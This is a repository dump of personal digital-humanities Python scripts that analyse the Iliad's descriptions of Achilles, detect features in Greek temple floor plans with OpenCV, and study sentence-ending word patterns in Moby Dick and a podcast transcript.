"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 13 14:44:22 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n#import requests\r\nurl = 'http://www.perseus.tufts.edu/hopper/xmlchunk?doc=Perseus%3Atext%3A1999.01.0134%3Abook%3D1%3Acard%3D1'\r\n\r\nresponse = requests.get(url)\r\n\r\nif not response.ok:\r\n response.raise_for_status()\r\n \r\nfile = open('iliad-perseus.xml', 'wb')\r\nfile.write(response.content)\r\nfile.close()\r\n\r\nfrom xml.etree import ElementTree as ET\r\n\r\ndoc = ET.parse('iliad-perseus.xml').getroot()\r\n\r\nchaps = doc.findall('.//div1[@type=\"chapter\"]')\r\nprint(\"Found\", len(chaps), \"chapters.\")\r\n\r\nplaintext = []\r\n\r\nfor chap in chaps:\r\n for note in chap.findall('note'):\r\n chap.remove(note)\r\n \r\n this_text= ' '. join(chap.itertext())\r\n plaintext.append(this_text)\r\n \r\niliad = ' '.join(plaintext)\r\n\r\nprint(len(iliad))"
},
{
"alpha_fraction": 0.5913200974464417,
"alphanum_fraction": 0.6437612771987915,
"avg_line_length": 21.125,
"blob_id": "d801717cb7854e4f03fdb62be4e5605a2c26b5dc",
"content_id": "c708d6841cb77609cf8622c1f182d968225a54a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 553,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/TempleLayout_Analyzer/CannyLineDetect.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 15:48:40 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread('Temple.png', 0)\r\nedges = cv2.Canny(img, 100, 200)\r\n\r\nplt.subplot(121), plt.imshow(img, cmap = 'gray')\r\nplt.title('Original Image'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(122), plt.imshow(edges, cmap = 'gray')\r\nplt.title('Uncanny Output'), plt.xticks([]), plt.yticks([])\r\n\r\nplt.show()\r\n#cv2.imwrite('Uncanny Output.jpg', img)\r\n\r\n\r\n#Works fine but needs to be callable"
},
{
"alpha_fraction": 0.5216480493545532,
"alphanum_fraction": 0.5649441480636597,
"avg_line_length": 19.5,
"blob_id": "ef2bb5341c3313547d744b43449cdfe070ff876f",
"content_id": "356c83fdce0573dfb7f31d01b68b71ee86b2e4b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1432,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 66,
"path": "/TempleLayout_Analyzer/CellaDetector.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 10 13:50:31 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nfilename = 'AnotherTemple.png'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\nkernel = np.ones((5, 5), np.uint8)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\nv_offset = 5\r\n\r\ncores = []\r\nimg_dilation = cv2.dilate(img, kernel, iterations = 2)\r\n\r\nfor y in range(v_offset, len(img_dilation)-v_offset):\r\n w = len(img_dilation[y])\r\n c = w // 2\r\n l = c - w // 20\r\n r = c + w // 20\r\n t = y - v_offset\r\n b = y + v_offset\r\n \r\n core = sum(np.ravel(img_dilation[t:b, l:r]))\r\n \r\n cores.append(core)\r\n \r\nplt.plot(cores)\r\n\r\n\r\nwall_x = img_dilation.shape[1] // 2\r\nwall_y = np.argmin(cores) + v_offset\r\n\r\nimg_annotated = img_dilation.copy()\r\ncv2.circle(img_annotated, (wall_x, wall_y), 10, (255, 0, 0), 5)\r\nplt.imshow(img_annotated)\r\ncv2.imwrite('output_AnotherOutput.jpg', img_annotated)\r\n\r\nstarts = []\r\nlens = []\r\ngoing = False\r\n\r\nfor x in range(len(img_dilation[wall_y])):\r\n if img_dilation[wall_y, x] > 0:\r\n going = False\r\n else:\r\n if going:\r\n lens[-1] += 1\r\n else:\r\n lens.append(1)\r\n starts.append(x)\r\n going = True\r\n \r\n"
},
{
"alpha_fraction": 0.5937593579292297,
"alphanum_fraction": 0.6003600358963013,
"avg_line_length": 24.830644607543945,
"blob_id": "c601d3096f3334e2a1b7e6e91f58ae5c464ee359",
"content_id": "6223d7e36b7c812732ad2974eb084869a89f0023",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3333,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 124,
"path": "/Illiad_Reader/AchillesReaderIII_Annotated.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "''' 02/08/2020 This script processes the Iliad, or it did when I still had Academic-based \r\naccess to the Perseus Database. It reads it as Cards, joins the cards into the actual \r\nbooks and stores the books as massive strings in a list. Each book is looped through again\r\nand if a line contiains any mention of Achilles it is processed and its descriptors extracted.'''\r\n\r\n\r\n# import statements\r\nimport xml.etree.ElementTree as ET\r\nimport nltk\r\n\r\n\r\nimport sys\r\n#import os\r\n#from nltk.parse import stanford\r\n\r\n# global values\r\nfile = 'tlg0012.tlg001.perseus-eng3.xml'\r\nns = {'tei':'http://www.tei-c.org/ns/1.0'}\r\n\r\n#definition of positive and negative words\r\nposWords = ['valiant', 'brilliant', 'swift-footed', 'glorious', 'great-hearted', 'godlike', 'godly', 'fair', 'great']\r\nnegWords = ['perish', 'perished', 'fatal', 'distressed', 'bitter', 'hollow', 'dead', 'evil']\r\n\r\n\r\n# Write a function to look for Achilles \r\n\r\ndef paraHasAchilles(para):\r\n #return True if paragraph mentions Achilles\r\n result = False\r\n if 'Achil' in para:\r\n result = True\r\n #Achilles sometimes referenced as 'Son of Peleus'\r\n elif 'Peleus' in para:\r\n result = True\r\n\r\n return result\r\n\r\n# main code starts here\r\n# parse XML document\r\nxml = ET.parse(file).getroot()\r\n\r\ncards = xml.findall('.//tei:div[@subtype=\"card\"]', ns)\r\nprint(len(cards), 'cards found')\r\n\r\n\r\n# this will hold book data\r\nbooks = []\r\n\r\n# read book by book \r\nfor book in xml.findall('.//tei:div[@subtype=\"book\"]', ns):\r\n \r\n # save the book number\r\n book_num = book.get('n')\r\n\r\n # this will hold extracted text for this book only\r\n text_segments = []\r\n\r\n # loop over XML chapter elements in this book\r\n for card in book.findall('.//tei:div[@subtype=\"card\"]', ns):\r\n \r\n # delete notes\r\n for note in card.findall('note'):\r\n card.remove(note)\r\n\r\n # extract text\r\n this_text = ' '.join(card.itertext())\r\n\r\n # add to long string\r\n text_segments.append(this_text)\r\n\r\n\r\n book_text = ' '.join(text_segments)\r\n \r\n \r\n \r\n books.append(book_text)\r\n\r\n # do nlp stuff\r\n # this will hold nounds and adjs for this book\r\n\r\n adjs = []\r\n nouns = []\r\n\r\n # segment each book into sentences\r\n sentences = nltk.sent_tokenize(book_text)\r\n \r\n charCount = 0\r\n # loop over sentences\r\n for sentence in sentences:\r\n for word in sentences:\r\n for char in word:\r\n charCount = charCount + 1\r\n \r\n # only consider sentences mentioning achilles\r\n if paraHasAchilles(sentence):\r\n\r\n # tokenize & pos-tag\r\n tokens = nltk.word_tokenize(sentence)\r\n tagged = nltk.pos_tag(tokens)\r\n\r\n # check for adjs and nouns, then store them\r\n for tok, pos in tagged:\r\n\r\n if pos == 'JJ':\r\n adjs.append(tok)\r\n\r\n elif pos.startswith('NN'):\r\n nouns.append(tok)\r\n\r\n# count pos, neg words\r\n# initialize counts\r\n\r\n posCount = 0\r\n negCount = 0\r\n\r\n# count positive descriptors\r\n for w in posWords:\r\n posCount = posCount + adjs.count(w)\r\n\r\n # count negative descriptors\r\n for w in negWords:\r\n negCount = negCount + adjs.count(w)\r\n\r\n print('{}\\t{}\\t{}'.format(book_num, posCount, negCount))\r\n\r\n "
},
{
"alpha_fraction": 0.5685928463935852,
"alphanum_fraction": 0.5827084183692932,
"avg_line_length": 23.620689392089844,
"blob_id": "ba857280c00baf2e492cc7bef63b916e354825ab",
"content_id": "313c9f9418fc83212b3881ac36582ba68faf5eaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2267,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 87,
"path": "/Illiad_Reader/AchillesReader.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 25 15:56:57 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport xml.etree.ElementTree as ET\r\nimport nltk\r\nimport os\r\nfrom nltk.parse import stanford\r\n\r\nfile = 'tlg0012.tlg001.perseus-eng3.xml'\r\nns = {'tei':'http://www.tei-c.org/ns/1.0',}\r\nxml = ET.parse(file).getroot()\r\ncards = xml.findall('.//tei:div[@subtype=\"card\"]', ns)\r\nprint(len(cards), 'cards found')\r\n \r\npara = []\r\nfor card in cards:\r\n para.append(' '.join(card.itertext()))\r\n \r\nplaintext = []\r\n# loop over xml chapter elements\r\nfor card in cards:\r\n # delete notes\r\n for note in card.findall('note'):\r\n card.remove(note)\r\n # extract text\r\n this_text = ' '.join(card.itertext())\r\n # add to long string\r\n plaintext.append(this_text)\r\n \r\n# now paste it all together\r\niliad = ' '.join(plaintext) \r\n\r\n#look for Achilles\r\ndef paraHasAchilles(para):\r\n \r\n result = False\r\n \r\n if 'Achil' in para:\r\n result = True\r\n elif 'Peleus' in para:\r\n result = True\r\n \r\n return result\r\n\r\nsentences = nltk.sent_tokenize(iliad)\r\ntokens = nltk.word_tokenize(sentences[2])\r\ntagged = nltk.pos_tag(tokens)\r\n\r\nadjs = []\r\nnouns = []\r\n\r\nfor sentence in sentences:\r\n if paraHasAchilles(sentence):\r\n tokens = nltk.word_tokenize(sentence)\r\n tagged = nltk.pos_tag(tokens)\r\n for tok, pos in tagged:\r\n if pos == 'JJ':\r\n adjs.append(sentence)\r\n elif pos.startswith('NN'):\r\n nouns.append(sentence)\r\n#print('adjs: ', adjs) \r\n#print('nouns: ', nouns)\r\n \r\ndef sections(l, n):\r\n #Yield successive n-sized chunks from l.\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]\r\n \r\nposWords = \"valiant brilliant swift-footed glorious great-hearted godlike godly fair great\"\r\nnegWords = \"perish perished fatal distressed bitter hollow dead evil\"\r\n\r\nnumb = 0\r\n\r\nfor i in sections(adjs, 100):\r\n numb = numb + 1\r\n posCount = 0\r\n for adj in posWords.split():\r\n posCount = posCount + adjs.count(adj)\r\n negCount = 0\r\n for adj in negWords.split():\r\n negCount = negCount + adjs.count(adj)\r\n print('posCount', numb, ':', posCount)\r\n print('negCount', numb, ':', negCount)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.616892397403717,
"alphanum_fraction": 0.6379187703132629,
"avg_line_length": 23.071428298950195,
"blob_id": "d036f2800f7090a5d808ab00b57129ec9ffc6586",
"content_id": "f7c534aeb72e4ebded41cca1e09ae8cb5be39f02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2806,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 112,
"path": "/TempleLayout_Analyzer/cella_wall.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n#\r\n# Load the image\r\n#\r\n\r\nimg = cv2.imread('TempleTeos.jpg')\r\ngrey = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n\r\nkernel = np.ones((5, 5))\r\neroded = cv2.dilate(grey, kernel)\r\n\r\n# Otsu's thresholding after Gaussian filtering\r\n# - see https://docs.opencv.org/3.4.0/d7/d4d/tutorial_py_thresholding.html\r\nret, b_w = cv2.threshold(eroded, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n\r\ndilated = cv2.erode(b_w, kernel)\r\n\r\nplt.figure(figsize=(15,10))\r\nplt.subplot(1, 2, 1)\r\nplt.imshow(eroded)\r\nplt.subplot(1, 2, 2)\r\nplt.imshow(dilated)\r\n\r\n\r\n#\r\n# Find the cella wall in the y dimension\r\n#\r\n\r\n# image dimensions\r\nheight, width = b_w.shape\r\ncenter = width // 2\r\n\r\n# this offset is one-half the height of the rectangular sample that constitutes a \"core\"\r\nv_offset = 5 # arbitrary\r\n# this is one-half the width of the core\r\nh_offset = width // 20 # 5 percent of the image width\r\n\r\n\r\n# traverse the y dimension of the image, travelling down the centre\r\n# - take \"cores\" at each y position\r\ncores = []\r\n\r\nfor y in range(v_offset, height-v_offset):\r\n \r\n # calculate sides of the core sample rectangle\r\n left = center - h_offset\r\n right = center + h_offset\r\n top = y - v_offset\r\n bottom = y + v_offset\r\n \r\n # add the pixels values within the sample\r\n core = sum(np.ravel(b_w[top:bottom, left:right]))\r\n \r\n # collect the core\r\n cores.append(core)\r\n \r\n# FIXME: x pos of the cella wall is center of the image\r\nwall_x = center\r\n# y pos of the cella wall is the minimum core value (most black pixels), plus offset\r\nwall_y = np.argmin(cores) + v_offset\r\n\r\n# annotate the image\r\nimg_annotated = img.copy()\r\ncv2.circle(img_annotated, (wall_x, wall_y), 10, (255, 0, 0), 5)\r\nplt.imshow(img_annotated)\r\n\r\n\r\n#\r\n# Calculate the length of the cella wall, find true center\r\n#\r\n\r\n# get continuous black segments along a given x\r\n\r\n# start (i.e. left edge) of each segment\r\nstarts = []\r\n# length of each segment\r\nlens = []\r\n\r\n# when this is True, we're in the middle of a seg\r\ngoing = False\r\n\r\n# traverse the cross-section:\r\n# - if the pixel is white\r\n# any ongoing segment is finished\r\n# - if the pixel is black\r\n# any ongoing segment is continued\r\n# otherwise, a new segment is started\r\nfor x in range(width):\r\n if b_w[wall_y, x] > 0:\r\n going = False\r\n else:\r\n if going:\r\n lens[-1] += 1\r\n else:\r\n lens.append(1)\r\n starts.append(x)\r\n going = True\r\n\r\n# which seg is the longest one?\r\ni = np.argmax(lens)\r\n\r\n# figure out edges of the cella\r\nleft = starts[i]\r\ncenter = left + lens[i] // 2\r\n\r\n# new annotated image\r\nimg_annotated = img.copy()\r\ncv2.circle(img_annotated, (center, wall_y), 10, (255, 0, 0), 5)\r\nplt.imshow(img_annotated)"
},
{
"alpha_fraction": 0.5708020329475403,
"alphanum_fraction": 0.591478705406189,
"avg_line_length": 44.61428451538086,
"blob_id": "d5b227c0c454057aeb81dbd2112414b18182852a",
"content_id": "be784bcfecc1a7dad2431e32905357f473c21432",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3200,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 70,
"path": "/Phrase_Segmentation/add_punctuation_function.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu June 18 09:24:33 2020\n\n@author: am_ka\n\"\"\"\n\n''' Testing Function to add periods to text-from-speech'''\n\nimport nltk \n\ndef PhraseMaker(text):\n phrase = text.split(' ') # Convert a string to a list\n precursor = [('X', 'Y')] # The initial 'precursor' value is arbitrary, it will\n # denote the word type that comes before 'i'\n \n word = 0 # keeps track of sentence length\n for i in phrase:\n \n word_tagged = nltk.pos_tag(nltk.word_tokenize(i))\n \n if not word_tagged: # Test for empty list\n continue\n \n else:\n word += 1\n print(\"{0}: {1} {2}\".format(word, word_tagged[0][0], word_tagged[0][1]))\n # Feasible word-type pairings based off the findings in 'mobydick_phrase_endings.py'\n pair1 = precursor[0][1].startswith('DT') and word_tagged[0][1].startswith('NN')\n pair2 = precursor[0][1].startswith('NN') and word_tagged[0][1].startswith('NN')\n pair3 = precursor[0][1].startswith('IN') and word_tagged[0][1].startswith('NN')\n # 'pair4' mostly for testing purposes, matching at least one position in the test phrase 'words'\n pair4 = precursor[0][1].startswith('DT') and word_tagged[0][1].startswith('IN')\n pair5 = precursor[0][1].startswith('PRP$') and word_tagged[0][1].startswith('NN')\n pair6 = precursor[0][1].startswith('IN') and word_tagged[0][1].startswith('DT')\n \n # Ascertain whether or not 'precursor' and 'word_tagged' represent the types of \n # words that would typically conclude a sentence\n right_pair = pair1 or pair2 or pair3 or pair4 or pair5 or pair6\n \n # If the pair matches any of the specified patterns and are within range of \n # the average lengths of sentences, add a period and reset the count\n if word in range(10, 16) and right_pair:\n phrase[phrase.index(i)] += '.'\n word = 0\n \n precursor = word_tagged\n \n # Produce the phrase with the inserted punctuation \n return \" \".join(phrase)\n \n \nwords = (\"I am really sorry you had to spend time figuring this out \"\n \"I understand this must be frustrating for you I really appreciate \"\n \"your help and I know it’s stressful when you’ve got work to do and \"\n \"you’re stuck like this As soon as you reply I’ll be automatically \"\n \"notified so I can start investigating for you\")\n\nprint(\"\\n\" + PhraseMaker(words) + \"\\n\")\n\n\ntranscript_1 = (\"Yeah, I think I largely do The uncomfortable thing for me \"\n \"I think is when I'm afraid I'm gonna make the other person \"\n \"feel uncomfortable Cause you know I bring up my dead mom, it's \"\n \"like the air gets sucked out of the room So I, I mostly want to \"\n \"be able to just talk about it and feel comfortable sharing this \"\n \"truth about my life and not make everyone sad or scared \"\n \"or uncomfortable\")\n\nprint(\"\\n\" + PhraseMaker(transcript_1) + \"\\n\")"
},
{
"alpha_fraction": 0.6308695673942566,
"alphanum_fraction": 0.6491304636001587,
"avg_line_length": 27.407407760620117,
"blob_id": "ba98baf242a7890a918d9280c56938389f606850",
"content_id": "57aad33371fc1fa95124f8ae0255e07470cce161",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2300,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 81,
"path": "/Phrase_Segmentation/mobydick_phrase_endings.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 18 12:19:16 2020\n\n@author: am_ka\n\"\"\"\n\nimport string\nimport operator \nimport nltk\nfrom nltk.book import *\nfrom nltk import word_tokenize \n\nmoby = gutenberg.sents('melville-moby_dick.txt')\nprint(\"\\nCorpus Loaded\")\n\ndef TagMaker(word):\n text = word_tokenize(word)\n tagged = nltk.pos_tag(text)\n return tagged[0][1]\n\nclean_tokens = []\nrec = {}\n\n\n# Iterate through each sentence in 'Moby Dick' and contruct a dictionary\n# entry for each word-pairing it ends with (attempting to avoid punctuation)\n# and its corresponding frequency. \n# If one instance of a specific word pairing already exists within the\n# dictionary, increase its frequency count by one instead of creating an entry.\n \n''' N.B. This could've been accomplished with nltk's 'bigrams' function, but \n it only works for nltk corpora. I wanted this to work with any large body\n of text, for which the formatting process would come easily. '''\n \nfor sentence in moby:\n if len(sentence) < 3:\n continue\n \n x = -1\n \n while sentence[x].isalpha() != True or sentence[x - 1].isalpha() != True or sentence[x] in string.punctuation:\n x -= 1\n if sentence[x] == i[0]:\n break\n if (len(sentence) + x) < 1:\n continue\n \n end_pair = sentence[x - 1] + \"/\" + sentence[x]\n \n if end_pair not in rec:\n rec[end_pair] = 1\n else: \n rec[end_pair] += 1\n\nprint(\"\\nRecord Complete\") \n# Output the 15 word pairings with the highest counts\nend_pairs = dict(sorted(rec.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairings\\n\" + \"-\"*26)\nprint(end_pairs)\n\n# Construct a dictionary now of word-type pairings coupled with their frequencies\n# within the prevously constructed dictionary.\ncodex = {}\nfor i in rec.keys():\n split_key = i.split(\"/\")\n \n j = TagMaker(split_key[0])\n k = TagMaker(split_key[1])\n \n tag_pair = j + \"/\" + k\n \n if tag_pair not in codex:\n codex[tag_pair] = 1\n else:\n codex[tag_pair] += 1\n \n# Output the 15 word-type pairings with the highest counts \nend_pair_tags = dict(sorted(codex.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairing Tags\\n\" + \"-\"*30)\nprint(end_pair_tags)"
},
{
"alpha_fraction": 0.44536083936691284,
"alphanum_fraction": 0.5189003348350525,
"avg_line_length": 21.88524627685547,
"blob_id": "1a1a84d4e5e711e45395c48adb7aef42b1d6d857",
"content_id": "a3d95fbeed519a16fd87efd150d3826774f8bd17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1455,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 61,
"path": "/TempleLayout_Analyzer/FeelinBlue.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 17 14:30:22 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\n#import numpy as np\r\n\r\ndef isBlue(px):\r\n '''return True if blue'''\r\n b, g, r = px\r\n truth = b > r + 50 and b > g + 50\r\n return truth\r\n\r\nfilename = 'ParthenonMrkd.png'\r\nimg = cv2.imread(filename)\r\n\r\n\r\nh, w = img.shape[:2]\r\nx = w // 2\r\nfor y in range(h):\r\n if isBlue(img[y, x]): \r\n break \r\n\r\nstuff = []\r\nfor x in range(w):\r\n if isBlue(img[y,x]):\r\n stuff.append(x)\r\n \r\nleft = min(stuff)\r\nright = max(stuff)\r\n\r\nTempleWidth = right - left\r\na = TempleWidth // 2\r\nb = (4*a) // 3\r\ncenter = ((right - left) // 2) + left\r\nc = (5*a) // 3\r\n\r\n'''Markers'''\r\ncv2.drawMarker(img, (center + a, y + b), (0, 255, 0), 2)\r\ncv2.drawMarker(img, (center,y), (0, 255, 0), 2)\r\ncv2.drawMarker(img, (center, y + b), (0, 255, 0), 2)\r\ncv2.drawMarker(img, (left, y + b), (0, 255, 0), 2)\r\n\r\n'''Circles'''\r\ncv2.circle(img, (center, y + b), c, (0, 0, 255), 2)\r\n#cv2.circle(img, (center + a, y + b), b, (0, 0, 255), 2)\r\n#cv2.circle(img, (center - a, y + b), b, (0, 0, 255), 2)\r\n#\r\ncv2.circle(img, (center, y +b), a, (0, 0, 255), 2)\r\n\r\n\r\n'''Circumscribed Pythagorean Triangle'''\r\ncv2.line(img, (center - a, y), (center + a, y + (2*b)), (0, 0, 255), 2)\r\n#cv2.line(img, (center - a, y), (center + a, y), (0, 0, 255), 2)\r\n#cv2.line(img, (center + a, y), (center + a, y + (2*b)), (0, 0, 255), 2)\r\n\r\n\r\ncv2.imwrite('Blue_Output_Parthenon.jpg', img)"
},
{
"alpha_fraction": 0.43512657284736633,
"alphanum_fraction": 0.5490506291389465,
"avg_line_length": 20.64285659790039,
"blob_id": "84f8cc4135375c6b9534a78ecb11b70e2763666d",
"content_id": "d3c889516222c2fd00fb4760ef4e65ae07b582bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 28,
"path": "/TempleLayout_Analyzer/HoughLineDetect.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 15 16:27:35 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread('Temple.png')\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nedges = cv2.Canny(gray, 50, 150, apertureSize = 3)\r\n\r\nlines = cv2.HoughLines(edges, 1, np.pi/180, 200)\r\nfor rho, theta in lines[0]:\r\n a = np.cos(theta)\r\n b = np.sin(theta)\r\n x0 = a*rho\r\n y0 = b*rho\r\n x1 = int(x0 + 1000*(-b))\r\n y1 = int(y0 + 1000*(a))\r\n x2 = int(x0 - 1000*(-b))\r\n y2 = int(y0 - 1000*(a))\r\n \r\n cv2.line(img, (x1,y1), (x2, y2), (0,0,255), 2)\r\n \r\ncv2.imwrite('lined_output.jpg', img)"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.5900253653526306,
"avg_line_length": 22.670000076293945,
"blob_id": "7d3b0fb07f350e4a01ef94a599877b1f030ae254",
"content_id": "29f9e589e64f093f2e44ca6379d0ff328de070da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2366,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 100,
"path": "/Phrase_Segmentation/podcast_phrase_endings.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 11 14:31:20 2021\n\n@author: am_ka\n\"\"\"\n\nimport string\nimport operator \nimport nltk\nfrom nltk import word_tokenize \n\nsource = open(\"podcast_1.txt\", \"r\")\nprint(\"\\nSource Mat Loaded\")\n\ndef TagMaker(word):\n text = word_tokenize(word)\n tagged = nltk.pos_tag(text)\n return tagged[0][1]\n\n\nlisted_sentences = []\nclean_tokens = []\nrec = {}\n \nterminal_punct = [\".\", \"?\", \"!\"]\n\nline = []\nfor sentence in source:\n \n sentence = sentence.split(\" \")\n \n for word in sentence:\n line.append(word)\n for char in word:\n if char in terminal_punct:\n listed_sentences.append(line)\n line = []\n \nsource.close() # Close the sourcefile \n\n## Process to clear the word of terminal punctuation (imperfect right now) \nline_index = 0\nword_index = 0\n \nfor line in listed_sentences:\n for word in line:\n for char in word:\n if char in terminal_punct:\n listed_sentences[line_index][word_index] = word.translate(str.maketrans('', '', string.punctuation))\n word_index += 1\n \n line_index += 1\n word_index = 0 \n \nprint(\"\\nSentences Configured\") \n\n\n## Extract the end pairings \nx = -1\nfor line in listed_sentences: \n if len(line) < 3:\n continue\n \n end_pair = line[x - 1] + \"/\" + line[x]\n \n if end_pair not in rec:\n rec[end_pair] = 1\n else: \n rec[end_pair] += 1\n\nprint(\"\\nRecord Complete\") \n \n## Output the 15 word pairings with the highest counts\nend_pairs = dict(sorted(rec.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairings\\n\" + \"-\"*26)\nprint(end_pairs)\n\n\n\n## Construct a dictionary now of word-type pairings coupled with their count\n## within the prevously constructed dictionary.\ncodex = {}\nfor i in rec.keys():\n split_key = i.split(\"/\")\n \n j = TagMaker(split_key[0])\n k = TagMaker(split_key[1])\n \n tag_pair = j + \"/\" + k\n \n if tag_pair not in codex:\n codex[tag_pair] = 1\n else:\n codex[tag_pair] += 1\n \n## Output the 15 word-type pairings with the highest counts \nend_pair_tags = dict(sorted(codex.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairing Tags\\n\" + \"-\"*30)\nprint(end_pair_tags)"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 65,
"blob_id": "6a03c4495ba8dbe940c79dc70d05fae4a6f3dcd3",
"content_id": "69793f892501820ee052c8f59d76e102b48a0fe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 3,
"path": "/README.md",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# PersonalProjects-Logos-Endiathetos-\n**A repo of scripts for my Digital Humanities' Projects**\nCombining literature with elements of machine learning to note trends in writing structure and style.\n"
},
{
"alpha_fraction": 0.5402597188949585,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 18.36842155456543,
"blob_id": "dbc80e06be6406dd7b35faebaf1339851368c895",
"content_id": "dec1878dcf7be9733c7f9c4b12251265510b6c52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 385,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 19,
"path": "/TempleLayout_Analyzer/Layout1.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 6 22:40:03 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\nfrom PIL import Image\r\n\r\nlayout = Image.open('Temple.PNG')\r\n\r\ndef Layout(pic):\r\n \r\n newImage = Image.new('RGB', (pic.size))\r\n\r\n for x in range(newImage.width):\r\n for y in range(newImage.height):\r\n newImage.putpixel((x, y), (pic.getpixel((x, y))))\r\n\r\n return newImage"
},
{
"alpha_fraction": 0.4693877696990967,
"alphanum_fraction": 0.5257142782211304,
"avg_line_length": 20.090909957885742,
"blob_id": "6027b6470ae1303ba9a8faf5c53315c60ebac18f",
"content_id": "1e91962c68299eb48d0ddb62660c6dc2c78630ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1225,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 55,
